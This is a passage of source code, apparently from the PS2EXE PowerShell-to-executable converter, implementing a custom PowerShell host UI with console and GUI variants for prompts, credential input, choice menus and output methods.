ConsoleColor DebugBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor VerboseForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic ConsoleColor VerboseBackgroundColor = ConsoleColor.Black;\r\n\r\n$(if (!$noConsole) {@\"\r\n\t\tpublic ConsoleColor ProgressForegroundColor = ConsoleColor.Yellow;\r\n\"@ } else {@\"\r\n\t\tpublic ConsoleColor ProgressForegroundColor = ConsoleColor.DarkCyan;\r\n\"@ })\r\n\t\tpublic ConsoleColor ProgressBackgroundColor = ConsoleColor.DarkCyan;\r\n\r\n\t\tpublic PS2EXEHostUI() : base()\r\n\t\t{\r\n\t\t\trawUI = new PS2EXEHostRawUI();\r\n$(if (!$noConsole) {@\"\r\n\t\t\trawUI.ForegroundColor = Console.ForegroundColor;\r\n\t\t\trawUI.BackgroundColor = Console.BackgroundColor;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override Dictionary<string, PSObject> Prompt(string caption, string message, System.Collections.ObjectModel.Collection<FieldDescription> descriptions)\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tif (!string.IsNullOrEmpty(message)) WriteLine(message);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(caption)) || (!string.IsNullOrEmpty(message)))\r\n\t\t\t{ string sTitel = System.AppDomain.CurrentDomain.FriendlyName, sMeldung = \"\";\r\n\r\n\t\t\t\tif (!string.IsNullOrEmpty(caption)) sTitel = caption;\r\n\t\t\t\tif (!string.IsNullOrEmpty(message)) sMeldung = message;\r\n\t\t\t\tMessageBox.Show(sMeldung, sTitel);\r\n\t\t\t}\r\n\r\n\t\t\t// Titel und Labeltext für Inputbox zurücksetzen\r\n\t\t\tibcaption = \"\";\r\n\t\t\tibmessage = \"\";\r\n\"@ })\r\n\t\t\tDictionary<string, PSObject> ret = new Dictionary<string, PSObject>();\r\n\t\t\tforeach (FieldDescription cd in descriptions)\r\n\t\t\t{\r\n\t\t\t\tType t = null;\r\n\t\t\t\tif (string.IsNullOrEmpty(cd.ParameterAssemblyFullName))\r\n\t\t\t\t\tt = typeof(string);\r\n\t\t\t\telse\r\n\t\t\t\t\tt = Type.GetType(cd.ParameterAssemblyFullName);\r\n\r\n\t\t\t\tif (t.IsArray)\r\n\t\t\t\t{\r\n\t\t\t\t\tType elementType = t.GetElementType();\r\n\t\t\t\t\tType genericListType = Type.GetType(\"System.Collections.Generic.List\"+((char)0x60).ToString()+\"1\");\r\n\t\t\t\t\tgenericListType = genericListType.MakeGenericType(new Type[] { elementType });\r\n\t\t\t\t\tConstructorInfo constructor = genericListType.GetConstructor(BindingFlags.CreateInstance | BindingFlags.Instance | BindingFlags.Public, null, Type.EmptyTypes, null);\r\n\t\t\t\t\tobject resultList = constructor.Invoke(null);\r\n\r\n\t\t\t\t\tint index = 0;\r\n\t\t\t\t\tstring data = \"\";\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\ttry\r\n\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(string.Format(\"{0}[{1}]: \", cd.Name, index));\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}[{1}]: \", cd.Name, index);\r\n\"@ })\r\n\t\t\t\t\t\t\tdata = ReadLine();\r\n\t\t\t\t\t\t\tif (string.IsNullOrEmpty(data))\r\n\t\t\t\t\t\t\t\tbreak;\r\n\r\n\t\t\t\t\t\t\tobject o = System.Convert.ChangeType(data, elementType);\r\n\t\t\t\t\t\t\tgenericListType.InvokeMember(\"Add\", BindingFlags.InvokeMethod | BindingFlags.Public | BindingFlags.Instance, null, resultList, new object[] { o });\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tcatch (Exception e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tthrow e;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tindex++;\r\n\t\t\t\t\t} while (true);\r\n\r\n\t\t\t\t\tSystem.Array retArray = (System.Array )genericListType.InvokeMember(\"ToArray\", BindingFlags.InvokeMethod | BindingFlags.Public | BindingFlags.Instance, null, resultList, null);\r\n\t\t\t\t\tret.Add(cd.Name, new PSObject(retArray));\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tobject o = null;\r\n\t\t\t\t\tstring l = null;\r\n\t\t\t\t\ttry\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (t != typeof(System.Security.SecureString))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (t != typeof(System.Management.Automation.PSCredential))\r\n\t\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(cd.Name);\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage)) Write(\" (Type !? for help.)\");\r\n\t\t\t\t\t\t\t\tif ((!string.IsNullOrEmpty(cd.Name)) || (!string.IsNullOrEmpty(cd.HelpMessage))) Write(\": \");\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}: \", cd.Name);\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage)) ibmessage += \"\\n(Type !? for help.)\";\r\n\"@ })\r\n\t\t\t\t\t\t\t\tdo {\r\n\t\t\t\t\t\t\t\t\tl = ReadLine();\r\n\t\t\t\t\t\t\t\t\tif (l == \"!?\")\r\n\t\t\t\t\t\t\t\t\t\tWriteLine(cd.HelpMessage);\r\n\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif (string.IsNullOrEmpty(l)) o = cd.DefaultValue;\r\n\t\t\t\t\t\t\t\t\t\tif (o == null)\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\ttry {\r\n\t\t\t\t\t\t\t\t\t\t\t\to = System.Convert.ChangeType(l, t);\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tcatch {\r\n\t\t\t\t\t\t\t\t\t\t\t\tWrite(\"Wrong format, please repeat input: \");\r\n\t\t\t\t\t\t\t\t\t\t\t\tl = \"!?\";\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} while (l == \"!?\");\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tPSCredential pscred = PromptForCredential(\"\", \"\", \"\", \"\");\r\n\t\t\t\t\t\t\t\to = pscred;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(string.Format(\"{0}: \", cd.Name));\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}: \", cd.Name);\r\n\"@ })\r\n\r\n\t\t\t\t\t\t\tSecureString pwd = null;\r\n\t\t\t\t\t\t\tpwd = ReadLineAsSecureString();\r\n\t\t\t\t\t\t\to = pwd;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tret.Add(cd.Name, new PSObject(o));\r\n\t\t\t\t\t}\r\n\t\t\t\t\tcatch (Exception e)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tthrow e;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n$(if ($noConsole) {@\"\r\n\t\t\t// Titel und Labeltext für Inputbox zurücksetzen\r\n\t\t\tibcaption = \"\";\r\n\t\t\tibmessage = \"\";\r\n\"@ })\r\n\t\t\treturn ret;\r\n\t\t}\r\n\r\n\t\tpublic override int PromptForChoice(string caption, string message, System.Collections.ObjectModel.Collection<ChoiceDescription> choices, int defaultChoice)\r\n\t\t{\r\n$(if ($noConsole) {@\"\r\n\t\t\tint iReturn = ChoiceBox.Show(choices, defaultChoice, caption, message);\r\n\t\t\tif (iReturn == -1) { iReturn = defaultChoice; }\r\n\t\t\treturn iReturn;\r\n\"@ } else {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption))\r\n\t\t\t\tWriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\t\t\tint idx = 0;\r\n\t\t\tSortedList<string, int> res = new SortedList<string, int>();\r\n\t\t\tforeach (ChoiceDescription cd in choices)\r\n\t\t\t{\r\n\t\t\t\tstring lkey = cd.Label.Substring(0, 1), ltext = cd.Label;\r\n\t\t\t\tint pos = cd.Label.IndexOf('&');\r\n\t\t\t\tif (pos > -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tlkey = cd.Label.Substring(pos + 1, 1).ToUpper();\r\n\t\t\t\t\tif (pos > 0)\r\n\t\t\t\t\t\tltext = cd.Label.Substring(0, pos) + cd.Label.Substring(pos + 1);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tltext = cd.Label.Substring(1);\r\n\t\t\t\t}\r\n\t\t\t\tres.Add(lkey.ToLower(), idx);\r\n\r\n\t\t\t\tif (idx > 0) Write(\" \");\r\n\t\t\t\tif (idx == defaultChoice)\r\n\t\t\t\t{\r\n\t\t\t\t\tWrite(ConsoleColor.Yellow, Console.BackgroundColor, string.Format(\"[{0}] {1}\", lkey, ltext));\r\n\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage))\r\n\t\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\" ({0})\", cd.HelpMessage));\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\"[{0}] {1}\", lkey, ltext));\r\n\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage))\r\n\t\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\" ({0})\", cd.HelpMessage));\r\n\t\t\t\t}\r\n\t\t\t\tidx++;\r\n\t\t\t}\r\n\t\t\tWrite(\": \");\r\n\r\n\t\t\ttry\r\n\t\t\t{\r\n\t\t\t\twhile (true)\r\n\t\t\t\t{ string s = Console.ReadLine().ToLower();\r\n\t\t\t\t\tif (res.ContainsKey(s))\r\n\t\t\t\t\t\treturn res[s];\r\n\t\t\t\t\tif (string.IsNullOrEmpty(s))\r\n\t\t\t\t\t\treturn defaultChoice;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tcatch { }\r\n\r\n\t\t\treturn defaultChoice;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSCredential PromptForCredential(string caption, string message, string userName, string targetName, PSCredentialTypes allowedCredentialTypes, PSCredentialUIOptions options)\r\n\t\t{\r\n$(if (!$noConsole -and !$credentialGUI) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\r\n\t\t\tstring un;\r\n\t\t\tif ((string.IsNullOrEmpty(userName)) || ((options & PSCredentialUIOptions.ReadOnlyUserName) == 0))\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tun = ReadLine();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tif (!string.IsNullOrEmpty(targetName)) Write(targetName + \"\\\\\");\r\n\t\t\t\tWriteLine(userName);\r\n\t\t\t\tun = userName;\r\n\t\t\t}\r\n\t\t\tSecureString pwd = null;\r\n\t\t\tWrite(\"Password: \");\r\n\t\t\tpwd = ReadLineAsSecureString();\r\n\r\n\t\t\tif (string.IsNullOrEmpty(un)) un = \"<NOUSER>\";\r\n\t\t\tif (!string.IsNullOrEmpty(targetName))\r\n\t\t\t{\r\n\t\t\t\tif (un.IndexOf('\\\\') < 0)\r\n\t\t\t\t\tun = targetName + \"\\\\\" + un;\r\n\t\t\t}\r\n\r\n\t\t\tPSCredential c2 = new PSCredential(un, pwd);\r\n\t\t\treturn c2;\r\n\"@ } else {@\"\r\n\t\t\tik.PowerShell.CredentialForm.UserPwd cred = CredentialForm.PromptForPassword(caption, message, targetName, userName, allowedCredentialTypes, options);\r\n\t\t\tif (cred != null)\r\n\t\t\t{\r\n\t\t\t\tSystem.Security.SecureString x = new System.Security.SecureString();\r\n\t\t\t\tforeach (char c in cred.Password.ToCharArray())\r\n\t\t\t\t\tx.AppendChar(c);\r\n\r\n\t\t\t\treturn new PSCredential(cred.User, x);\r\n\t\t\t}\r\n\t\t\treturn null;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSCredential PromptForCredential(string caption, string message, string userName, string targetName)\r\n\t\t{\r\n$(if (!$noConsole -and !$credentialGUI) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\r\n\t\t\tstring un;\r\n\t\t\tif (string.IsNullOrEmpty(userName))\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tun = ReadLine();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tif (!string.IsNullOrEmpty(targetName)) Write(targetName + \"\\\\\");\r\n\t\t\t\tWriteLine(userName);\r\n\t\t\t\tun = userName;\r\n\t\t\t}\r\n\t\t\tSecureString pwd = null;\r\n\t\t\tWrite(\"Password: \");\r\n\t\t\tpwd = ReadLineAsSecureString();\r\n\r\n\t\t\tif (string.IsNullOrEmpty(un)) un = \"<NOUSER>\";\r\n\t\t\tif (!string.IsNullOrEmpty(targetName))\r\n\t\t\t{\r\n\t\t\t\tif (un.IndexOf('\\\\') < 0)\r\n\t\t\t\t\tun = targetName + \"\\\\\" + un;\r\n\t\t\t}\r\n\r\n\t\t\tPSCredential c2 = new PSCredential(un, pwd);\r\n\t\t\treturn c2;\r\n\"@ } else {@\"\r\n\t\t\tik.PowerShell.CredentialForm.UserPwd cred = CredentialForm.PromptForPassword(caption, message, targetName, userName, PSCredentialTypes.Default, PSCredentialUIOptions.Default);\r\n\t\t\tif (cred != null)\r\n\t\t\t{\r\n\t\t\t\tSystem.Security.SecureString x = new System.Security.SecureString();\r\n\t\t\t\tforeach (char c in cred.Password.ToCharArray())\r\n\t\t\t\t\tx.AppendChar(c);\r\n\r\n\t\t\t\treturn new PSCredential(cred.User, x);\r\n\t\t\t}\r\n\t\t\treturn null;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSHostRawUserInterface RawUI\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn rawUI;\r\n\t\t\t}\r\n\t\t}\r\n\r\n$(if ($noConsole) {@\"\r\n\t\tprivate string ibcaption;\r\n\t\tprivate string ibmessage;\r\n\"@ })\r\n\r\n\t\tpublic override string ReadLine()\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\treturn Console.ReadLine();\r\n\"@ } else {@\"\r\n\t\t\tstring sWert = \"\";\r\n\t\t\tif (InputBox.Show(ibcaption, ibmessage, ref sWert) == DialogResult.OK)\r\n\t\t\t\treturn sWert;\r\n\t\t\telse\r\n\t\t\t\treturn \"\";\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tprivate System.Security.SecureString getPassword()\r\n\t\t{\r\n\t\t\tSystem.Security.SecureString pwd = new System.Security.SecureString();\r\n\t\t\twhile (true)\r\n\t\t\t{\r\n\t\t\t\tConsoleKeyInfo i = Console.ReadKey(true);\r\n\t\t\t\tif (i.Key == ConsoleKey.Enter)\r\n\t\t\t\t{\r\n\t\t\t\t\tConsole.WriteLine();\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if (i.Key == ConsoleKey.Backspace)\r\n\t\t\t\t{\r\n\t\t\t\t\tif (pwd.Length > 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tpwd.RemoveAt(pwd.Length - 1);\r\n\t\t\t\t\t\tConsole.Write(\"\\b \\b\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\telse if (i.KeyChar != '\\u0000')\r\n\t\t\t\t{\r\n\t\t\t\t\tpwd.AppendChar(i.KeyChar);\r\n\t\t\t\t\tConsole.Write(\"*\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn pwd;\r\n\t\t}\r\n\r\n\t\tpublic override System.Security.SecureString ReadLineAsSecureString()\r\n\t\t{\r\n\t\t\tSystem.Security.SecureString secstr = new System.Security.SecureString();\r\n$(if (!$noConsole) {@\"\r\n\t\t\tsecstr = getPassword();\r\n\"@ } else {@\"\r\n\t\t\tstring sWert = \"\";\r\n\r\n\t\t\tif (InputBox.Show(ibcaption, ibmessage, ref sWert, true) == DialogResult.OK)\r\n\t\t\t{\r\n\t\t\t\tforeach (char ch in sWert)\r\n\t\t\t\t\tsecstr.AppendChar(ch);\r\n\t\t\t}\r\n\"@ })\r\n\t\t\treturn secstr;\r\n\t\t}\r\n\r\n\t\t// called by Write-Host\r\n\t\tpublic override void Write(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.Write(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void Write(string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.Write(value);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Debug\r\n\t\tpublic override void WriteDebugLine(string message)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tWriteLineInternal(DebugForegroundColor, DebugBackgroundColor, string.Format(\"DEBUG: {0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Information);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Error\r\n\t\tpublic override void WriteErrorLine(string value)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tif (ConsoleInfo.IsErrorRedirected())\r\n\t\t\t\tConsole.Error.WriteLine(string.Format(\"ERROR: {0}\", value));\r\n\t\t\telse\r\n\t\t\t\tWriteLineInternal(ErrorForegroundColor, ErrorBackgroundColor, string.Format(\"ERROR: {0}\", value));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void WriteLine()\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.WriteLine();\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(\"\", System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void WriteLine(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.WriteLine(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n$(if (!$noError -And !$noConsole) {@\"\r\n\t\tprivate void WriteLineInternal(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.WriteLine(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\t\t}\r\n\"@ })\r\n\r\n\t\t// called by Write-Output\r\n\t\tpublic override void WriteLine(string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.WriteLine(value);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n$(if ($noConsole) {@\"\r\n\t\tpublic ProgressForm pf = null;\r\n\"@ })\r\n\t\tpublic override void WriteProgress(long sourceId, ProgressRecord record)\r\n\t\t{\r\n$(if ($noConsole) {@\"\r\n\t\t\tif (pf == null)\r\n\t\t\t{\r\n\t\t\t\tpf = new ProgressForm(ProgressForegroundColor);\r\n\t\t\t\tpf.Show();\r\n\t\t\t}\r\n\t\t\tpf.Update(record);\r\n\t\t\tif (record.RecordType == ProgressRecordType.Completed)\r\n\t\t\t{\r\n\t\t\t\tif (pf.GetCount() == 0) pf = null;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\t// called by Write-Verbose\r\n\t\tpublic override void WriteVerboseLine(string message)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tWriteLine(VerboseForegroundColor, VerboseBackgroundColor, string.Format(\"VERBOSE: {0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Information);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Warning\r\n\t\tpublic override void WriteWarningLine(string message)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tWriteLineInternal(WarningForegroundColor, WarningBackgroundColor, string.Format(\"WARNING: {0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Warning);\r\n\"@ } })\r\n\t\t}\r\n\t}\r\n\r\n\tinternal class PS2EXEHost : PSHost\r\n\t{\r\n\t\tprivate PS2EXEApp parent;\r\n\t\tprivate PS2EXEHostUI ui = null;\r\n\r\n\t\tprivate CultureInfo originalCultureInfo = System.Threading.Thread.CurrentThread.CurrentCulture;\r\n\r\n\t\tprivate CultureInfo originalUICultureInfo = System.Threading.Thread.CurrentThread.CurrentUICulture;\r\n\r\n\t\tprivate Guid myId = Guid.NewGuid();\r\n\r\n\t\tpublic PS2EXEHost(PS2EXEApp app, PS2EXEHostUI ui)\r\n\t\t{\r\n\t\t\tthis.parent = app;\r\n\t\t\tthis.ui = ui;\r\n\t\t}\r\n\r\n\t\tpublic class ConsoleColorProxy\r\n\t\t{\r\n\t\t\tprivate PS2EXEHostUI _ui;\r\n\r\n\t\t\tpublic ConsoleColorProxy(PS2EXEHostUI ui)\r\n\t\t\t{\r\n\t\t\t\tif (ui == null) throw new ArgumentNullException(\"ui\");\r\n\t\t\t\t_ui = ui;\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ErrorForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ErrorForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ErrorForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ErrorBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ErrorBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ErrorBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor WarningForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.WarningForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.WarningForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor WarningBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.WarningBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.WarningBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor DebugForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.DebugForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.DebugForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor DebugBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.DebugBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.DebugBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor VerboseForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.VerboseForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.VerboseForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor VerboseBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.VerboseBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.VerboseBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ProgressForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ProgressForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ProgressForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ProgressBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ProgressBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ProgressBackgroundColor = value; }\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override PSObject PrivateData\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tif (ui == null) return null;\r\n\t\t\t\treturn _consoleColorProxy ?? (_consoleColorProxy = PSObject.AsPSObject(new ConsoleColorProxy(ui)));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprivate PSObject _consoleColorProxy;\r\n\r\n\t\tpublic override System.Globalization.CultureInfo CurrentCulture\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.originalCultureInfo;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Globalization.CultureInfo CurrentUICulture\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.originalUICultureInfo;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Guid InstanceId\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.myId;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override string Name\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn \"PS2EXE_Host\";\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override PSHostUserInterface UI\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ui;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Version Version\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn new Version(0, 5, 0, 21);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override void EnterNestedPrompt()\r\n\t\t{\r\n\t\t}\r\n\r\n\t\tpublic override void ExitNestedPrompt()\r\n\t\t{\r\n\t\t}\r\n\r\n\t\tpublic override void NotifyBeginApplication()\r\n\t\t{\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tpublic override void NotifyEndApplication()\r\n\t\t{\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tpublic override void SetShouldExit(int 